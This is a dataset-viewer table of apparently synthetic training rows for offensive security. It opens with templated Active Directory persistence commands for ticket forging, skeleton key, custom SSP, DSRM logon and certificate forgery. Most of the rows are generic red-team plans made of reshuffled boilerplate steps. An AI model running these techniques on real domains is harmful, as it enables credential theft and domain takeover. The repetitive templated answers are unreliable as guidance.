instruction stringclasses 270
values | input stringlengths 3 214 | output stringclasses 297
values |
|---|---|---|
Silver Ticket | ticketer.py -nthash <machine_nt_hash> -domain-sid <domain_sid> -domain <domain> <anyuser> | Note or procedural step under 'Silver Ticket'. |
Silver Ticket | Directory Service Restore Mode (DSRM)\ | Note or procedural step under 'Silver Ticket'. |
Silver Ticket | PowerShell New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD | Note or procedural step under 'Silver Ticket'. |
Skeleton Key | mimikatz "privilege::debug" "misc::skeleton" "exit" #password is mimikatz | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Custom SSP | mimikatz "privilege::debug" "misc::memssp" "exit" | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Custom SSP | C:\Windows\System32\kiwissp.log | Note or procedural step under 'Custom SSP'. |
Golden certificate | certipy ca -backup -ca '<ca_name>' -username <user>@<domain> -hashes <hash> | Note or procedural step under 'Golden certificate'. |
Golden certificate | certipy forge -ca-pfx <ca_private_key> -upn <user>@<domain> -subject 'CN=<user>,CN=Users,DC=<CORP>,DC=<LOCAL> | Note or procedural step under 'Golden certificate'. |
Diamond ticket | ticketer.py -request -domain <domain> -user <user> -password <password> -nthash <hash> -aesKey <aeskey> -domain-sid <domain_sid> -user-id <user_id> -groups '512,513,518,519,520' <anyuser> | Note or procedural step under 'Diamond ticket'. |
Saphire Ticket | ticketer.py -request -impersonate <anyuser> -domain <domain> -user <user> -password <password> -nthash <hash> -aesKey <aeskey> -domain-sid <domain_sid> 'ignored' | Note or procedural step under 'Saphire Ticket'. |
Stolen VPN credential allowing remote access: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Stolen VPN credential allowing remote access | Step 1: Confirm authorization and scope before proceeding.
Step 2: Search non-destructively for credential material in user profiles and browser stores.
Step 3: Enumerate visible services and shares without altering state to avoid noisy detection.
Step 4: Map the local network perspective and identify what domain re... |
Public-facing web app with possible misconfiguration: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders. | Public-facing web app with possible misconfiguration | Step 1: Confirm authorization and scope before proceeding.
Step 2: Map the local network perspective and identify what domain resources are reachable.
Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities.
Step 4: Search non-destructively for credential material in u... |
User opened document with embedded macro: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | User opened document with embedded macro | Step 1: Confirm authorization and scope before proceeding.
Step 2: Map the local network perspective and identify what domain resources are reachable.
Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities.
Step 4: Assess potential for lateral movement from this host ... |
Supplier/third-party compromise suspected: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders. | Supplier/third-party compromise suspected | Step 1: Confirm authorization and scope before proceeding.
Step 2: Coordinate with defenders to capture telemetry for each test to validate detection capabilities.
Step 3: Map the local network perspective and identify what domain resources are reachable.
Step 4: Search non-destructively for credential material in u... |
Supplier/third-party compromise suspected: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders. | Supplier/third-party compromise suspected | Step 1: Confirm authorization and scope before proceeding.
Step 2: Coordinate with defenders to capture telemetry for each test to validate detection capabilities.
Step 3: Assess potential for lateral movement from this host and prioritize targets accordingly.
Step 4: Map the local network perspective and identify w... |
OAuth app consent token acquired: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders. | OAuth app consent token acquired | Step 1: Confirm authorization and scope before proceeding.
Step 2: Search non-destructively for credential material in user profiles and browser stores.
Step 3: Map the local network perspective and identify what domain resources are reachable.
Step 4: Assess potential for lateral movement from this host and priorit... |
User opened document with embedded macro: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test? | User opened document with embedded macro | Step 1: Confirm authorization and scope before proceeding.
Step 2: Search non-destructively for credential material in user profiles and browser stores.
Step 3: Enumerate visible services and shares without altering state to avoid noisy detection.
Step 4: Map the local network perspective and identify what domain re... |
Compromised webmail session token obtained: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Compromised webmail session token obtained | Step 1: Confirm authorization and scope before proceeding.
Step 2: Map the local network perspective and identify what domain resources are reachable.
Step 3: Assess potential for lateral movement from this host and prioritize targets accordingly.
Step 4: Coordinate with defenders to capture telemetry for each test ... |
Compromised webmail session token obtained: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test? | Compromised webmail session token obtained | Step 1: Confirm authorization and scope before proceeding.
Step 2: Coordinate with defenders to capture telemetry for each test to validate detection capabilities.
Step 3: Search non-destructively for credential material in user profiles and browser stores.
Step 4: Map the local network perspective and identify what... |
OAuth app consent token acquired: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders. | OAuth app consent token acquired | Step 1: Confirm authorization and scope before proceeding.
Step 2: Map the local network perspective and identify what domain resources are reachable.
Step 3: Assess potential for lateral movement from this host and prioritize targets accordingly.
Step 4: Coordinate with defenders to capture telemetry for each test ... |
Exposed remote management interface reachable: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders. | Exposed remote management interface reachable | Step 1: Confirm authorization and scope before proceeding.
Step 2: Coordinate with defenders to capture telemetry for each test to validate detection capabilities.
Step 3: Search non-destructively for credential material in user profiles and browser stores.
Step 4: Assess potential for lateral movement from this hos... |
Supplier/third-party compromise suspected: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders. | Supplier/third-party compromise suspected | Step 1: Confirm authorization and scope before proceeding.
Step 2: Map the local network perspective and identify what domain resources are reachable.
Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities.
Step 4: Search non-destructively for credential material in u... |
Supplier/third-party compromise suspected: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test? | Supplier/third-party compromise suspected | Step 1: Confirm authorization and scope before proceeding.
Step 2: Map the local network perspective and identify what domain resources are reachable.
Step 3: Enumerate visible services and shares without altering state to avoid noisy detection.
Step 4: Coordinate with defenders to capture telemetry for each test to... |
User opened document with embedded macro: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test? | User opened document with embedded macro | Step 1: Confirm authorization and scope before proceeding.
Step 2: Assess potential for lateral movement from this host and prioritize targets accordingly.
Step 3: Search non-destructively for credential material in user profiles and browser stores.
Step 4: Map the local network perspective and identify what domain ... |
Compromised webmail session token obtained: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test? | Compromised webmail session token obtained | Step 1: Confirm authorization and scope before proceeding.
Step 2: Enumerate visible services and shares without altering state to avoid noisy detection.
Step 3: Search non-destructively for credential material in user profiles and browser stores.
Step 4: Assess potential for lateral movement from this host and prio... |
Stolen VPN credential allowing remote access: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders. | Stolen VPN credential allowing remote access | Step 1: Confirm authorization and scope before proceeding.
Step 2: Enumerate visible services and shares without altering state to avoid noisy detection.
Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities.
Step 4: Map the local network perspective and identify wha... |
OAuth app consent token acquired: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test? | OAuth app consent token acquired | Step 1: Confirm authorization and scope before proceeding.
Step 2: Search non-destructively for credential material in user profiles and browser stores.
Step 3: Enumerate visible services and shares without altering state to avoid noisy detection.
Step 4: Coordinate with defenders to capture telemetry for each test ... |
Compromised webmail session token obtained: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Compromised webmail session token obtained | Step 1: Confirm authorization and scope before proceeding.
Step 2: Enumerate visible services and shares without altering state to avoid noisy detection.
Step 3: Map the local network perspective and identify what domain resources are reachable.
Step 4: Coordinate with defenders to capture telemetry for each test to... |
User opened document with embedded macro: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test? | User opened document with embedded macro | Step 1: Confirm authorization and scope before proceeding.
Step 2: Map the local network perspective and identify what domain resources are reachable.
Step 3: Enumerate visible services and shares without altering state to avoid noisy detection.
Step 4: Search non-destructively for credential material in user profil... |
Compromised webmail session token obtained: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Compromised webmail session token obtained | Step 1: Confirm authorization and scope before proceeding.
Step 2: Assess potential for lateral movement from this host and prioritize targets accordingly.
Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities.
Step 4: Search non-destructively for credential material... |
OAuth app consent token acquired: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | OAuth app consent token acquired | Step 1: Confirm authorization and scope before proceeding.
Step 2: Search non-destructively for credential material in user profiles and browser stores.
Step 3: Enumerate visible services and shares without altering state to avoid noisy detection.
Step 4: Map the local network perspective and identify what domain re... |
Exposed remote management interface reachable: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders. | Exposed remote management interface reachable | Step 1: Confirm authorization and scope before proceeding.
Step 2: Coordinate with defenders to capture telemetry for each test to validate detection capabilities.
Step 3: Assess potential for lateral movement from this host and prioritize targets accordingly.
Step 4: Search non-destructively for credential material... |
User opened document with embedded macro: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test? | User opened document with embedded macro | Step 1: Confirm authorization and scope before proceeding.
Step 2: Enumerate visible services and shares without altering state to avoid noisy detection.
Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities.
Step 4: Search non-destructively for credential material i... |
OAuth app consent token acquired: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | OAuth app consent token acquired | Step 1: Confirm authorization and scope before proceeding.
Step 2: Map the local network perspective and identify what domain resources are reachable.
Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities.
Step 4: Assess potential for lateral movement from this host ... |
Public-facing web app with possible misconfiguration: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders. | Public-facing web app with possible misconfiguration | Step 1: Confirm authorization and scope before proceeding.
Step 2: Assess potential for lateral movement from this host and prioritize targets accordingly.
Step 3: Map the local network perspective and identify what domain resources are reachable.
Step 4: Enumerate visible services and shares without altering state ... |
User opened document with embedded macro: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders. | User opened document with embedded macro | Step 1: Confirm authorization and scope before proceeding.
Step 2: Assess potential for lateral movement from this host and prioritize targets accordingly.
Step 3: Search non-destructively for credential material in user profiles and browser stores.
Step 4: Coordinate with defenders to capture telemetry for each tes... |
Phishing foothold on user workstation: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders. | Phishing foothold on user workstation | Step 1: Confirm authorization and scope before proceeding.
Step 2: Map the local network perspective and identify what domain resources are reachable.
Step 3: Search non-destructively for credential material in user profiles and browser stores.
Step 4: Assess potential for lateral movement from this host and priorit... |
Compromised webmail session token obtained: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Compromised webmail session token obtained | Step 1: Confirm authorization and scope before proceeding.
Step 2: Search non-destructively for credential material in user profiles and browser stores.
Step 3: Assess potential for lateral movement from this host and prioritize targets accordingly.
Step 4: Map the local network perspective and identify what domain ... |
OAuth app consent token acquired: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | OAuth app consent token acquired | Step 1: Confirm authorization and scope before proceeding.
Step 2: Search non-destructively for credential material in user profiles and browser stores.
Step 3: Enumerate visible services and shares without altering state to avoid noisy detection.
Step 4: Coordinate with defenders to capture telemetry for each test ... |
Stolen VPN credential allowing remote access: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders. | Stolen VPN credential allowing remote access | Step 1: Confirm authorization and scope before proceeding.
Step 2: Search non-destructively for credential material in user profiles and browser stores.
Step 3: Enumerate visible services and shares without altering state to avoid noisy detection.
Step 4: Map the local network perspective and identify what domain re... |
Compromised webmail session token obtained: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Compromised webmail session token obtained | Step 1: Confirm authorization and scope before proceeding.
Step 2: Coordinate with defenders to capture telemetry for each test to validate detection capabilities.
Step 3: Map the local network perspective and identify what domain resources are reachable.
Step 4: Search non-destructively for credential material in u... |
Compromised webmail session token obtained: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test? | Compromised webmail session token obtained | Step 1: Confirm authorization and scope before proceeding.
Step 2: Map the local network perspective and identify what domain resources are reachable.
Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities.
Step 4: Enumerate visible services and shares without alterin... |
Exposed remote management interface reachable: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Exposed remote management interface reachable | Step 1: Confirm authorization and scope before proceeding.
Step 2: Map the local network perspective and identify what domain resources are reachable.
Step 3: Enumerate visible services and shares without altering state to avoid noisy detection.
Step 4: Search non-destructively for credential material in user profil... |
Stolen VPN credential allowing remote access: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Stolen VPN credential allowing remote access | Step 1: Confirm authorization and scope before proceeding.
Step 2: Assess potential for lateral movement from this host and prioritize targets accordingly.
Step 3: Map the local network perspective and identify what domain resources are reachable.
Step 4: Search non-destructively for credential material in user prof... |
Public-facing web app with possible misconfiguration: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Public-facing web app with possible misconfiguration | Step 1: Confirm authorization and scope before proceeding.
Step 2: Assess potential for lateral movement from this host and prioritize targets accordingly.
Step 3: Enumerate visible services and shares without altering state to avoid noisy detection.
Step 4: Coordinate with defenders to capture telemetry for each te... |
User opened document with embedded macro: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | User opened document with embedded macro | Step 1: Confirm authorization and scope before proceeding.
Step 2: Coordinate with defenders to capture telemetry for each test to validate detection capabilities.
Step 3: Enumerate visible services and shares without altering state to avoid noisy detection.
Step 4: Search non-destructively for credential material i... |
Exposed remote management interface reachable: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test? | Exposed remote management interface reachable | Step 1: Confirm authorization and scope before proceeding.
Step 2: Search non-destructively for credential material in user profiles and browser stores.
Step 3: Assess potential for lateral movement from this host and prioritize targets accordingly.
Step 4: Coordinate with defenders to capture telemetry for each tes... |
OAuth app consent token acquired: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | OAuth app consent token acquired | Step 1: Confirm authorization and scope before proceeding.
Step 2: Enumerate visible services and shares without altering state to avoid noisy detection.
Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities.
Step 4: Map the local network perspective and identify wha... |
Compromised webmail session token obtained: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Compromised webmail session token obtained | Step 1: Confirm authorization and scope before proceeding.
Step 2: Coordinate with defenders to capture telemetry for each test to validate detection capabilities.
Step 3: Enumerate visible services and shares without altering state to avoid noisy detection.
Step 4: Search non-destructively for credential material i... |
Supplier/third-party compromise suspected: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Supplier/third-party compromise suspected | Step 1: Confirm authorization and scope before proceeding.
Step 2: Map the local network perspective and identify what domain resources are reachable.
Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities.
Step 4: Assess potential for lateral movement from this host ... |
Stolen VPN credential allowing remote access: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Stolen VPN credential allowing remote access | Step 1: Confirm authorization and scope before proceeding.
Step 2: Search non-destructively for credential material in user profiles and browser stores.
Step 3: Map the local network perspective and identify what domain resources are reachable.
Step 4: Coordinate with defenders to capture telemetry for each test to ... |
Supplier/third-party compromise suspected: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test? | Supplier/third-party compromise suspected | Step 1: Confirm authorization and scope before proceeding.
Step 2: Assess potential for lateral movement from this host and prioritize targets accordingly.
Step 3: Enumerate visible services and shares without altering state to avoid noisy detection.
Step 4: Search non-destructively for credential material in user p... |
Public-facing web app with possible misconfiguration: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders. | Public-facing web app with possible misconfiguration | Step 1: Confirm authorization and scope before proceeding.
Step 2: Coordinate with defenders to capture telemetry for each test to validate detection capabilities.
Step 3: Assess potential for lateral movement from this host and prioritize targets accordingly.
Step 4: Map the local network perspective and identify w... |
OAuth app consent token acquired: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test? | OAuth app consent token acquired | Step 1: Confirm authorization and scope before proceeding.
Step 2: Enumerate visible services and shares without altering state to avoid noisy detection.
Step 3: Map the local network perspective and identify what domain resources are reachable.
Step 4: Assess potential for lateral movement from this host and priori... |
User opened document with embedded macro: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test? | User opened document with embedded macro | Step 1: Confirm authorization and scope before proceeding.
Step 2: Assess potential for lateral movement from this host and prioritize targets accordingly.
Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities.
Step 4: Enumerate visible services and shares without al... |
Phishing foothold on user workstation: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders. | Phishing foothold on user workstation | Step 1: Confirm authorization and scope before proceeding.
Step 2: Map the local network perspective and identify what domain resources are reachable.
Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities.
Step 4: Enumerate visible services and shares without alterin... |
Compromised webmail session token obtained: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Compromised webmail session token obtained | Step 1: Confirm authorization and scope before proceeding.
Step 2: Enumerate visible services and shares without altering state to avoid noisy detection.
Step 3: Coordinate with defenders to capture telemetry for each test to validate detection capabilities.
Step 4: Map the local network perspective and identify wha... |
OAuth app consent token acquired: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | OAuth app consent token acquired | Step 1: Confirm authorization and scope before proceeding.
Step 2: Assess potential for lateral movement from this host and prioritize targets accordingly.
Step 3: Enumerate visible services and shares without altering state to avoid noisy detection.
Step 4: Coordinate with defenders to capture telemetry for each te... |
OAuth app consent token acquired: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | OAuth app consent token acquired | Step 1: Confirm authorization and scope before proceeding.
Step 2: Map the local network perspective and identify what domain resources are reachable.
Step 3: Assess potential for lateral movement from this host and prioritize targets accordingly.
Step 4: Search non-destructively for credential material in user prof... |
Stolen VPN credential allowing remote access: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Stolen VPN credential allowing remote access | Step 1: Confirm authorization and scope before proceeding.
Step 2: Coordinate with defenders to capture telemetry for each test to validate detection capabilities.
Step 3: Map the local network perspective and identify what domain resources are reachable.
Step 4: Assess potential for lateral movement from this host ... |
Domain-joined VM with read access to DC info: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Domain-joined VM with read access to DC info | Step 1: Confirm authorization and scope before proceeding.
Step 2: Prioritize targets that are likely to yield credentials or privileged access.
Step 3: Enumerate directory objects that are accessible and capture LDAP responses for analysis.
Step 4: Identify critical hosts (DCs, CAs, backup servers) and plan lab-foc... |
Domain-joined VM with read access to DC info: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test? | Domain-joined VM with read access to DC info | Step 1: Confirm authorization and scope before proceeding.
Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment.
Step 3: Prioritize targets that are likely to yield credentials or privileged access.
Step 4: Enumerate directory objects that are accessible and capture LDAP responses for ... |
Network foothold with standard user rights: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test? | Network foothold with standard user rights | Step 1: Confirm authorization and scope before proceeding.
Step 2: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 3: Enumerate directory objects that are accessible and capture LDAP responses for analysis.
Step 4: Prioritize targets that are likely to yield credentials or pr... |
Read-only view into asset inventory/CMDB: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders. | Read-only view into asset inventory/CMDB | Step 1: Confirm authorization and scope before proceeding.
Step 2: Prioritize targets that are likely to yield credentials or privileged access.
Step 3: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment.
Step 4: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-... |
Ability to perform internal DNS queries: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Ability to perform internal DNS queries | Step 1: Confirm authorization and scope before proceeding.
Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment.
Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 4: Prioritize targets that are likely to yield credentials or privileged acc... |
Ability to perform internal DNS queries: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Ability to perform internal DNS queries | Step 1: Confirm authorization and scope before proceeding.
Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment.
Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 4: Enumerate directory objects that are accessible and capture LDAP response... |
Access to a multi-share file server: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders. | Access to a multi-share file server | Step 1: Confirm authorization and scope before proceeding.
Step 2: Enumerate directory objects that are accessible and capture LDAP responses for analysis.
Step 3: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment.
Step 4: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focu... |
Domain-joined VM with read access to DC info: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Domain-joined VM with read access to DC info | Step 1: Confirm authorization and scope before proceeding.
Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment.
Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 4: Prioritize targets that are likely to yield credentials or privileged acc... |
Read-only view into asset inventory/CMDB: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Read-only view into asset inventory/CMDB | Step 1: Confirm authorization and scope before proceeding.
Step 2: Enumerate directory objects that are accessible and capture LDAP responses for analysis.
Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 4: Use passive discovery sources first (DNS, ARP, CMDB) to map t... |
Access to a multi-share file server: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Access to a multi-share file server | Step 1: Confirm authorization and scope before proceeding.
Step 2: Prioritize targets that are likely to yield credentials or privileged access.
Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 4: Enumerate directory objects that are accessible and capture LDAP respons... |
Ability to perform internal DNS queries: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Ability to perform internal DNS queries | Step 1: Confirm authorization and scope before proceeding.
Step 2: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 3: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment.
Step 4: Enumerate directory objects that are accessible and capture LDAP response... |
Read-only view into asset inventory/CMDB: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Read-only view into asset inventory/CMDB | Step 1: Confirm authorization and scope before proceeding.
Step 2: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 3: Enumerate directory objects that are accessible and capture LDAP responses for analysis.
Step 4: Prioritize targets that are likely to yield credentials or pr... |
Network foothold with standard user rights: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Network foothold with standard user rights | Step 1: Confirm authorization and scope before proceeding.
Step 2: Prioritize targets that are likely to yield credentials or privileged access.
Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 4: Use passive discovery sources first (DNS, ARP, CMDB) to map the environm... |
Network foothold with standard user rights: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders. | Network foothold with standard user rights | Step 1: Confirm authorization and scope before proceeding.
Step 2: Enumerate directory objects that are accessible and capture LDAP responses for analysis.
Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 4: Prioritize targets that are likely to yield credentials or pr... |
Domain-joined VM with read access to DC info: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test? | Domain-joined VM with read access to DC info | Step 1: Confirm authorization and scope before proceeding.
Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment.
Step 3: Prioritize targets that are likely to yield credentials or privileged access.
Step 4: Enumerate directory objects that are accessible and capture LDAP responses for ... |
Ability to perform internal DNS queries: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Ability to perform internal DNS queries | Step 1: Confirm authorization and scope before proceeding.
Step 2: Prioritize targets that are likely to yield credentials or privileged access.
Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 4: Enumerate directory objects that are accessible and capture LDAP respons... |
Access to a multi-share file server: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders. | Access to a multi-share file server | Step 1: Confirm authorization and scope before proceeding.
Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment.
Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 4: Enumerate directory objects that are accessible and capture LDAP response... |
Network foothold with standard user rights: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Network foothold with standard user rights | Step 1: Confirm authorization and scope before proceeding.
Step 2: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 3: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment.
Step 4: Prioritize targets that are likely to yield credentials or privileged acc... |
Access to a multi-share file server: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Access to a multi-share file server | Step 1: Confirm authorization and scope before proceeding.
Step 2: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 3: Enumerate directory objects that are accessible and capture LDAP responses for analysis.
Step 4: Use passive discovery sources first (DNS, ARP, CMDB) to map t... |
Ability to perform internal DNS queries: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Ability to perform internal DNS queries | Step 1: Confirm authorization and scope before proceeding.
Step 2: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 3: Prioritize targets that are likely to yield credentials or privileged access.
Step 4: Enumerate directory objects that are accessible and capture LDAP respons... |
Ability to perform internal DNS queries: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Ability to perform internal DNS queries | Step 1: Confirm authorization and scope before proceeding.
Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment.
Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 4: Enumerate directory objects that are accessible and capture LDAP response... |
Ability to perform internal DNS queries: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Ability to perform internal DNS queries | Step 1: Confirm authorization and scope before proceeding.
Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment.
Step 3: Enumerate directory objects that are accessible and capture LDAP responses for analysis.
Step 4: Prioritize targets that are likely to yield credentials or privilege... |
Ability to perform internal DNS queries: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Ability to perform internal DNS queries | Step 1: Confirm authorization and scope before proceeding.
Step 2: Prioritize targets that are likely to yield credentials or privileged access.
Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 4: Enumerate directory objects that are accessible and capture LDAP respons... |
Access to a multi-share file server: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Access to a multi-share file server | Step 1: Confirm authorization and scope before proceeding.
Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment.
Step 3: Prioritize targets that are likely to yield credentials or privileged access.
Step 4: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-... |
Access to a multi-share file server: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Access to a multi-share file server | Step 1: Confirm authorization and scope before proceeding.
Step 2: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 3: Prioritize targets that are likely to yield credentials or privileged access.
Step 4: Use passive discovery sources first (DNS, ARP, CMDB) to map the environm... |
Read-only view into asset inventory/CMDB: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Read-only view into asset inventory/CMDB | Step 1: Confirm authorization and scope before proceeding.
Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment.
Step 3: Enumerate directory objects that are accessible and capture LDAP responses for analysis.
Step 4: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focu... |
Network foothold with standard user rights: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test? | Network foothold with standard user rights | Step 1: Confirm authorization and scope before proceeding.
Step 2: Enumerate directory objects that are accessible and capture LDAP responses for analysis.
Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 4: Use passive discovery sources first (DNS, ARP, CMDB) to map t... |
Network foothold with standard user rights: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test? | Network foothold with standard user rights | Step 1: Confirm authorization and scope before proceeding.
Step 2: Prioritize targets that are likely to yield credentials or privileged access.
Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 4: Use passive discovery sources first (DNS, ARP, CMDB) to map the environm... |
Domain-joined VM with read access to DC info: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Domain-joined VM with read access to DC info | Step 1: Confirm authorization and scope before proceeding.
Step 2: Enumerate directory objects that are accessible and capture LDAP responses for analysis.
Step 3: Prioritize targets that are likely to yield credentials or privileged access.
Step 4: Use passive discovery sources first (DNS, ARP, CMDB) to map the env... |
Domain-joined VM with read access to DC info: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders. | Domain-joined VM with read access to DC info | Step 1: Confirm authorization and scope before proceeding.
Step 2: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 3: Enumerate directory objects that are accessible and capture LDAP responses for analysis.
Step 4: Use passive discovery sources first (DNS, ARP, CMDB) to map t... |
